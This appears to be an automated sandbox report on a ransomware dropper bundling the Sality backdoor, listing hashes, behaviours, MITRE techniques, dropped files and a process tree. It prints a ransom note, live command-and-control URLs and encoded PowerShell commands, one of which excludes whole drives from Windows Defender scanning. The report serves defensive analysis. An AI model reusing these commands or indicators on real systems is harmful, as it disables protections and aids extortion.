Overview

overview

10

Static

static

3

bl4ke.exe

windows7-x64

10

Resubmissions

28-12-2024 02:53

241228-ddq9ravnfr 10

28-12-2024 02:51

241228-dcawdavndm 10

Analysis

  • max time kernel
    68s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-12-2024 02:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bl4ke.exe

  • Size

    469KB

  • MD5

    5d9e7031a5d7498bf610633a3d0f6981

  • SHA1

    f11cd03ef06dd53e1cef1ff15693efc919030ac3

  • SHA256

    e056b9ff0256dd40dac919efe92006ee49a3f50d222ab17e755c7dcdbc34a4fc

  • SHA512

    0d846e552d8f2f344257bd6e65e4f3fbfc5d41d90892c9d19af3abe4dc4074a3c73e6802269800fdaaa90a0b0deb78bad40f0c1b75a34a6c840144f316945975

  • SSDEEP

    6144:igQ9ahMwdrlDDX3RtZL7bieYMy4rZEqwpgJCNXFhHcuci:igQsMkrl5t0jINggJMFOuci

Score
10/10
salitybackdoordefense_evasiondiscoveryevasionransomwaretrojanupx

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA

Ransom Note
ALL COMPUTER DATA ENCRYPTED! 00:00:00 TIME AFTER ALL FILES WILL BE DELETED YOUR ID CC50539B88A0A18DB0C83C7C2609D4FD NOW YOU NEED TO PAY TO RECOVER YOUR DATA AFTER MONEY TRANSFER YOU WILL RECIEVE THE DECRYPTOR CONTACTS TELEGRAM @comodosecurity EMAIL [email protected] Any attempts to return your files with the third-party tools can be fatal for your encrypted files! The most part of the third-party software change data within the encrypted file to restore it but this causes damage to the files. Finally it will be impossible to decrypt your files! There are several plain steps to restore your files but if you do not follow them we will not be able to help you!

Extracted

Family

sality

C2

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Signatures

  • Modifies firewall policy service 3 TTPs 3 IoCs
    evasion
  • Sality

    Sality is backdoor written in C++, first discovered in 2003.

    backdoorsality
  • Sality family
    sality
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 6 IoCs
    evasiontrojan
  • Deletes itself 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 10 IoCs
  • Windows security modification 2 TTPs 7 IoCs
    evasiontrojan
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops autorun.inf file 1 TTPs 2 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
      PID:1060
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
        PID:1140
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
          PID:1184
          • C:\Users\Admin\AppData\Local\Temp\bl4ke.exe
            "C:\Users\Admin\AppData\Local\Temp\bl4ke.exe"
            2⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AZgBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAWQBPAFUAJwAnAFIARQAgAEYAVQBDAEsARQBEACAAQgBZACAAQgBMAEEASwBFACEAIQAhACAATABNAEEATwAgAEwATQBBAE8AIABMAE0AQQBPACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAagB5AHUAIwA+AA=="
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2332
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAbAByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAegBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZwB2ACMAPgA="
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2428
            • C:\Users\Admin\AppData\Local\Temp\gdihell.exe
              "C:\Users\Admin\AppData\Local\Temp\gdihell.exe"
              3⤵
              • Executes dropped EXE
              PID:2688
            • C:\Users\Admin\AppData\Local\Temp\Cronic.exe
              "C:\Users\Admin\AppData\Local\Temp\Cronic.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 2664 -s 516
                4⤵
                • Loads dropped DLL
                PID:300
            • C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe
              "C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe"
              3⤵
              • Modifies firewall policy service
              • UAC bypass
              • Windows security bypass
              • Deletes itself
              • Executes dropped EXE
              • Windows security modification
              • Checks whether UAC is enabled
              • Enumerates connected drives
              • Drops autorun.inf file
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:2960
            • C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe
              "C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe"
              3⤵
              • Executes dropped EXE
              PID:2676
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA"
              3⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              PID:2536
            • C:\Users\Admin\AppData\Local\Temp\hslshader.exe
              "C:\Users\Admin\AppData\Local\Temp\hslshader.exe"
              3⤵
              • Executes dropped EXE
              PID:3044
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
          1⤵
            PID:2040
          • C:\Windows\system32\conhost.exe
            \??\C:\Windows\system32\conhost.exe "4513546031089410523-1526343102340787320-243682679-482637516-1203798743-61412519"
            1⤵
              PID:2176
            • C:\Windows\system32\conhost.exe
              \??\C:\Windows\system32\conhost.exe "1700957881-171940515-131059866112753235941184091724-1645576370-1407482095-1583420026"
              1⤵
                PID:2648
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "438620695-17626443421697823119-723239277969678317-3511231071123114130-1001284338"
                1⤵
                  PID:2796
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-2076825105-20514249582044961478-1737135903597568063-1987936759-7674901541236263117"
                  1⤵
                  • Loads dropped DLL
                  PID:2604
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "-1032920669-280101262-70901194-2035275008-1428789747-1661907942959451589-778448842"
                  1⤵
                    PID:2056

                  Network

                  MITRE ATT&CK Enterprise v15

                  Reconnaissance

                  Resource Development

                  Initial Access

                  Replication Through Removable Media

                  1
                  T1091

                  Execution

                  Persistence

                  Create or Modify System Process

                  1
                  T1543

                  Windows Service

                  1
                  T1543.003

                  Privilege Escalation

                  Abuse Elevation Control Mechanism

                  1
                  T1548

                  Bypass User Account Control

                  1
                  T1548.002

                  Create or Modify System Process

                  1
                  T1543

                  Windows Service

                  1
                  T1543.003

                  Defense Evasion

                  Abuse Elevation Control Mechanism

                  1
                  T1548

                  Bypass User Account Control

                  1
                  T1548.002

                  Impair Defenses

                  4
                  T1562

                  Disable or Modify System Firewall

                  1
                  T1562.004

                  Disable or Modify Tools

                  3
                  T1562.001

                  Modify Registry

                  6
                  T1112

                  Obfuscated Files or Information

                  1
                  T1027

                  Command Obfuscation

                  1
                  T1027.010

                  Credential Access

                  Discovery

                  Peripheral Device Discovery

                  1
                  T1120

                  Query Registry

                  1
                  T1012

                  System Information Discovery

                  3
                  T1082

                  System Location Discovery

                  1
                  T1614

                  System Language Discovery

                  1
                  T1614.001

                  Lateral Movement

                  Replication Through Removable Media

                  1
                  T1091

                  Collection

                  Command and Control

                  Exfiltration

                  Impact

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\ApplicationDraw.exe
                    Filesize

                    85KB

                    MD5

                    d2f7ee8114edbcb9aa332c1d8bbb9488

                    SHA1

                    d97e993f1eaf8e4c990f06e9afa4f47efd9a5b06

                    SHA256

                    0cb621f367e9aa5c046760be200dd0b5aa9b6e45c92f28adc73b34b369702f82

                    SHA512

                    268ea70de1dfc4e97e0d057bd625e5080dd139564224d41dc23293b1eaf8205b359e3ab934fcc0b6ae1f0995cb9761ac5a84cdc2a8c40d0afa164eb7c6601243

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FUCKSCREEN.exe
                    Filesize

                    11KB

                    MD5

                    c8d6c1b9d0ab8940e827cc7f0f96f4b4

                    SHA1

                    cdc2d69d48748b8836d6e2a4e58a370aebb55288

                    SHA256

                    e9f500615b06fdb6b4eb4cd4e1664ba1da33fe3c2fc1eb0b1e561e06a20f1fbd

                    SHA512

                    86b1e836fb79cf81cf15f7b889d4fcbee9de9f64cca741d012c5fe49fbf1bfc532bbbdb04114672765eff6cecc4ec4dd118fc1d2b52af1595020f09e64665d2a

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\YOUR_FILES_ARE_FUCKED.HTA
                    Filesize

                    64KB

                    MD5

                    f97a6c9d463f7005d28c273f7f369744

                    SHA1

                    5a594b71f3254fdd8fa1575b7898cd7cb8d0506c

                    SHA256

                    729a7e9dfff763b95cae12e25875cd14acb4c74236d17494e32a72078df9931f

                    SHA512

                    b9a1b151b241977130fa7fd7b3ce183c7836c31cc1c5d82ae5d77d2683bb2771020bc438fb4faa8d24d151234c5adadbd87a58b3be0e9f9ff556d26aaa8c79c7

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\hslshader.exe
                    Filesize

                    39KB

                    MD5

                    7aa1ce5f332f6bde0ab29720fb768020

                    SHA1

                    0c42cce17644b24b8144f60559dc491b542e957d

                    SHA256

                    6947123f789c83df8c9f3487fb7a2404da6255ee7391aecaede51647205aaadd

                    SHA512

                    42c42203c5ba9319848be6ad716369d55e73a05909d6288eb074ae2ef5330f0d72e48c16d475ae8420445b2b9acd69762b8d8bb2b270beff998bc48e0ba69bc8

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7S17JRVUIQD6DYJFG907.temp
                    Filesize

                    7KB

                    MD5

                    3efd6f10a5a0df0db510aabdee958261

                    SHA1

                    2e4096aef5551de851ccb8933228184814e0360f

                    SHA256

                    2299f5a198428a1d2a22c2e874b1d4acba4a0ecbb24a7c3a5e1a5b896b656ec8

                    SHA512

                    9babcf1e042840de7238754893bcd92046c95dd18235edfa0f166e6c8669236fbcca022059ee3419e8d507fe3ad69a7790ea03fcedd33288d231e286b2664ffe

                    Download Submit

                  • C:\oano.exe
                    Filesize

                    100KB

                    MD5

                    9325eb940b5fa9af35df3d2960afddf6

                    SHA1

                    eace2afad56fe3a2855120bd057c5d3ea4f1cac8

                    SHA256

                    c8559f54cc57c7755d6e31aecf4a43c8d655fe77b56d68d1e5a73ee8e9948a26

                    SHA512

                    e469337ea899311e013943f7b0ba0eb879b465d88a819f1c3ebed161b654cea45d01dc8a845045fc77bb3c727f0ec66541f51a7ec0cab6951780ae650ddd094b

                    Download Submit

                  • \Users\Admin\AppData\Local\Temp\Cronic.exe
                    Filesize

                    14KB

                    MD5

                    726d50c3e3dd789d43664aa5c3c3f9de

                    SHA1

                    f69e053040b09e422a712c4bf31ce20875186e31

                    SHA256

                    8a865d95f2c90c97fe3d762608ebc8040033cac5882e5534675b6b1f056e9c19

                    SHA512

                    872b347a0dd0cdb46959b9b41ad20dfc7dcfaf3cee8a27aa90b33700a44147edf631e03c3bd7ca8867dbcb2b02efc6c05ee0e8dd31062770c39d2ad13a1db56a

                    Download Submit

                  • \Users\Admin\AppData\Local\Temp\gdihell.exe
                    Filesize

                    38KB

                    MD5

                    65389a4a1a5ec277c42d0dfacd59999b

                    SHA1

                    5098c44ec3a0c1be4d6d8f3dc5ddeeef73848c2c

                    SHA256

                    8476bbe92dd772b4397ecb33fed7286f1b9ef698812b921d0113d5ead4607990

                    SHA512

                    6fef9575d945f761d31406ce528e820945cb6f970eb78dc91c7a7da6e9efe6b2dbb1b55b96911d8115ac98dd95cf1f73a0cec13ad4cbe9750fe33df08e88f8b6

                    Download Submit

                  • memory/1060-58-0x00000000001D0000-0x00000000001D2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/2024-13-0x0000000000300000-0x0000000000320000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/2024-24-0x0000000000300000-0x0000000000318000-memory.dmp

                    Filesize

                    96KB

                    Download

                  • memory/2024-38-0x0000000000300000-0x0000000000318000-memory.dmp

                    Filesize

                    96KB

                    Download

                  • memory/2332-69-0x00000000054A0000-0x00000000054A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2332-37-0x0000000073AE0000-0x000000007408B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/2332-4-0x0000000073AE0000-0x000000007408B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/2332-192-0x0000000073AE0000-0x000000007408B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/2332-3-0x0000000073AE0000-0x000000007408B000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/2332-71-0x00000000054A0000-0x00000000054A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2332-2-0x0000000073AE1000-0x0000000073AE2000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2332-68-0x0000000005490000-0x0000000005492000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/2428-88-0x00000000055A0000-0x00000000055A2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/2428-79-0x00000000055B0000-0x00000000055B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2536-106-0x0000000000400000-0x0000000000401000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2688-14-0x00000000011F0000-0x0000000001210000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/2688-87-0x00000000000F0000-0x00000000000F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2688-138-0x00000000011F0000-0x0000000001210000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/2960-48-0x0000000000400000-0x0000000000418000-memory.dmp

                    Filesize

                    96KB

                    Download

                  • memory/2960-54-0x00000000021C0000-0x000000000324E000-memory.dmp

                    Filesize

                    16.6MB

                    Download

                  • memory/2960-98-0x00000000003F0000-0x00000000003F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2960-50-0x00000000021C0000-0x000000000324E000-memory.dmp

                    Filesize

                    16.6MB

                    Download

                  • memory/2960-117-0x00000000003E0000-0x00000000003E2000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/2960-52-0x00000000021C0000-0x000000000324E000-memory.dmp

                    Filesize

                    16.6MB

                    Download

                  • memory/2960-53-0x00000000021C0000-0x000000000324E000-memory.dmp

                    Filesize

                    16.6MB

                    Download

                  • memory/3044-55-0x0000000000190000-0x00000000001B0000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/3044-114-0x0000000000030000-0x0000000000031000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3044-141-0x0000000000190000-0x00000000001B0000-memory.dmp

                    Filesize

                    128KB

                    Download